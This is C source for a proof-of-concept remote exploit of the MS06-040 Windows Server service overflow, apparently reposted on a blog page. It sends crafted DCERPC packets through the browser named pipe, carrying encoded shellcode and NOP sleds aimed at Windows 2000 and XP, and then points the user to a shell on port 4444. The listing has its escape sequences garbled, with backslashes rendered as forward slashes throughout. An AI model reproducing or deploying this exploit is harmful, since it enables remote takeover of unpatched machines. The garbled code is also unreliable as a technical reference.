MS06040CODE

#include <stdio.h>

#include <windows.h>

 

#pragma comment(lib, "mpr")

#pragma comment(lib, "Rpcrt4")

 

// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0

unsigned char DCERPC_Bind_RPC_Service[] =

       "/x05/x00/x0B/x03/x10/x00/x00/x00/x48/x00/x00/x00/x00/x00/x00/x00"

       "/xD0/x16/xD0/x16/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x01/x00"

       "/xC8/x4F/x32/x4B/x70/x16/xD3/x01/x12/x78/x5A/x47/xBF/x6E/xE1/x88"

       "/x03/x00/x00/x00/x04/x5D/x88/x8A/xEB/x1C/xC9/x11/x9F/xE8/x08/x00"

       "/x2B/x10/x48/x60/x02/x00/x00/x00";

 

// request windows api: NetprPathCanonicalize (0x1f)

unsigned char DCERPC_Request_RPC_Service[] =

       "/x05/x00/x00/x03/x10/x00/x00/x00/x30/x08/x00/x00/x00/x00/x00/x00"

       "/x18/x08/x00/x00/x00/x00/x1f/x00/xff/xff/xff/xff/x01/x00/x00/x00"

       "/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x00/x00";

 

       // path ...

 

unsigned char DCERPC_Request_RPC_Service_[] =

       "/xfa/x00/x00/x00/x02/x00/x00/x00/x00/x00/x00/x00/x02/x00/x00/x00"

       "/x00/x00/x00/x00/xfa/x00/x00/x00/x00/x00/x00/x00";

 

unsigned char sc[] =

       "/x6a/x51/x59/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xa8/x97/x90"

       "/x88/x83/xeb/xfc/xe2/xf4/x29/x53/x6f/x67/x57/x68/xd4/x74/xc2/x7c"

       "/xdd/x60/x51/x68/x6f/x77/xc8/x1c/xfc/xac/x8c/x1c/xd5/xb4/x23/xeb"

       "/x95/xf0/xa9/x78/x1b/xc7/xb0/x1c/xcf/xa8/xa9/x7c/xd9/x03/x9c/x1c"

       "/x91/x66/x99/x57/x09/x24/x2c/x57/xe4/x8f/x69/x5d/x9d/x89/x6a/x7c"

       "/x64/xb3/xfc/xb3/xb8/xfd/x4d/x1c/xcf/xac/xa9/x7c/xf6/x03/xa4/xdc"

       "/x1b/xd7/xb4/x96/x7b/x8b/x84/x1c/x19/xe4/x8c/x8b/xf1/x4b/x99/x4c"

       "/xf4/x03/xeb/xa7/x1b/xc8/xa4/x1c/xe0/x94/x05/x1c/xd0/x80/xf6/xff"

       "/x1e/xc6/xa6/x7b/xc0/x77/x7e/xf1/xc3/xee/xc0/xa4/xa2/xe0/xdf/xe4"

       "/xa2/xd7/xfc/x68/x40/xe0/x63/x7a/x6c/xb3/xf8/x68/x46/xd7/x21/x72"

       "/xf6/x09/x45/x9f/x92/xdd/xc2/x95/x6f/x58/xc0/x4e/x99/x7d/x05/xc0"

       "/x6f/x5e/xfb/xc4/xc3/xdb/xfb/xd4/xc3/xcb/xfb/x68/x40/xee/xc0/x86"

       "/xcc/xee/xfb/x1e/x71/x1d/xc0/x33/x8a/xf8/x6f/xc0/x6f/x5e/xc2/x87"

       "/xc1/xdd/x57/x47/xf8/x2c/x05/xb9/x79/xdf/x57/x41/xc3/xdd/x57/x47"

       "/xf8/x6d/xe1/x11/xd9/xdf/x57/x41/xc0/xdc/xfc/xc2/x6f/x58/x3b/xff"

       "/x77/xf1/x6e/xee/xc7/x77/x7e/xc2/x6f/x58/xce/xfd/xf4/xee/xc0/xf4"

       "/xfd/x01/x4d/xfd/xc0/xd1/x81/x5b/x19/x6f/xc2/xd3/x19/x6a/x99/x57"

       "/x63/x22/x56/xd5/xbd/x76/xea/xbb/x03/x05/xd2/xaf/x3b/x23/x03/xff"

       "/xe2/x76/x1b/x81/x6f/xfd/xec/x68/x46/xd3/xff/xc5/xc1/xd9/xf9/xfd"

       "/x91/xd9/xf9/xc2/xc1/x77/x78/xff/x3d/x51/xad/x59/xc3/x77/x7e/xfd"

       "/x6f/x77/x9f/x68/x40/x03/xff/x6b/x13/x4c/xcc/x68/x46/xda/x57/x47"

       "/xf8/x67/x66/x77/xf0/xdb/x57/x41/x6f/x58";

 

int main(int argc, char* argv[])

{

       HANDLE hFile;

       NETRESOURCE nr;

 

       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];

 

       unsigned int i;

 

       unsigned char szInBuf[4096];

       unsigned long dwRead, nWritten;

 

       unsigned char szReqBuf[2096];

 

       if (argc < 3){

               printf("[-] Usage: ms06040poc <host> [target]/n");

               printf("/t1 - Windows 2000 SP0-SP4/n");

               printf("/t2 - Windows XP SP0-SP1/n");

               return -1;

       }

 

       memset(szReqBuf, 0, sizeof(szReqBuf));

 

       if (atoi(argv[2]) == 1) {

               unsigned char szBuff[1064];

 

               // build payload buffer

               memset(szBuff, '/x90', 1000);

               memcpy(szBuff+630, sc, sizeof(sc));

 

               for(i=1000; i<1064; i+=4) {

                       memcpy(szBuff+i, "/x04/x08/x02/x00", 4);

               }

 

               // build request buffer

               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);

               memcpy(szReqBuf+44, "/x15/x02/x00/x00", 4); /* max count */

               memcpy(szReqBuf+48, "/x00/x00/x00/x00", 4); /* offset */

               memcpy(szReqBuf+52, "/x15/x02/x00/x00", 4); /* actual count */

               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));

               memcpy(szReqBuf+1120, "/x00/x00/x00/x00", 4); /* align string */

               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);

               memcpy(szReqBuf+1140 , "/xeb/x02", 2);

       }

       if (atoi(argv[2]) == 2) {

               unsigned char szBuff[708];

 

               memset(szBuff, '/x90', 612); /* size of shellcode */

               memcpy(szBuff, sc, sizeof(sc));

 

               memcpy(szBuff+612, "/x0a/x08/x02/x00", 4);

               memset(szBuff+616, 'A', 8); // 8 bytes padding

               memcpy(szBuff+624, "/x04/x08/x02/x00", 4);

               memset(szBuff+628, '/x90', 32);

               memcpy(szBuff+660, "/x04/x08/x02/x00", 4);

               memset(szBuff+664, 'B', 8); // 8 bytes padding

               memcpy(szBuff+672, "/x04/x08/x02/x00", 4);

               memset(szBuff+676, '/x90', 32);

 

               // build request buffer

               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);

               memcpy(szReqBuf+44, "/x63/x01/x00/x00", 4); /* max count */

               memcpy(szReqBuf+48, "/x00/x00/x00/x00", 4); /* offset */

               memcpy(szReqBuf+52, "/x63/x01/x00/x00", 4); /* actual count */

               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));

               memcpy(szReqBuf+764, "/x00/x00/x00/x00", 4); /* align string */

               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);

       }

 

       printf("[+] Connecting to %s ... /n", argv[1]);

 

       _snprintf(szRemoteName, sizeof(szRemoteName), "////%s//ipc$", argv[1]);

       nr.dwType = RESOURCETYPE_ANY;

       nr.lpLocalName = NULL;

       nr.lpProvider = NULL;

       nr.lpRemoteName = szRemoteName;

       if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) {

               printf("[-] Failed to connect to host !/n");

               return -1;

       }

 

       _snprintf(szPipePath, sizeof(szPipePath), "////%s//pipe//browser", argv[1]);

       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

 

       if (hFile == INVALID_HANDLE_VALUE) {

               printf("[-] Failed to open named pipe !/n");

               return -1;

       }

 

       printf("[+] Binding to RPC interface ... /n");

       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {

               printf("[-] Failed to bind to interface !/n");

               CloseHandle(hFile);

               return -1;

       }

 

       printf("[+] Sending RPC request ... /n");

       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {

               printf("[-] Unable to transmit RPC request !/n");

               CloseHandle(hFile);

               return -1;

       }

 

       printf("[+] Now check for shell on %s:4444 !/n", argv[1]);

 

       return 0;

}

你可能感兴趣的:(windows,service,null,buffer,Build,interface)